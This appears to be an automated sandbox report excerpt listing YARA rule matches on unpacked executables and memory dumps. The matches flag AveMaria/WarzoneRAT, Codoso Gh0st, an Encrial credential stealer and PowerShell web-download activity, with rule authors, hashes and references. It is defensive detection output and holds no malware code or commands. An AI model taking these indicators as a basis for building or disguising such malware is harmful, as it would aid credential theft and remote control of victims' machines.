Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
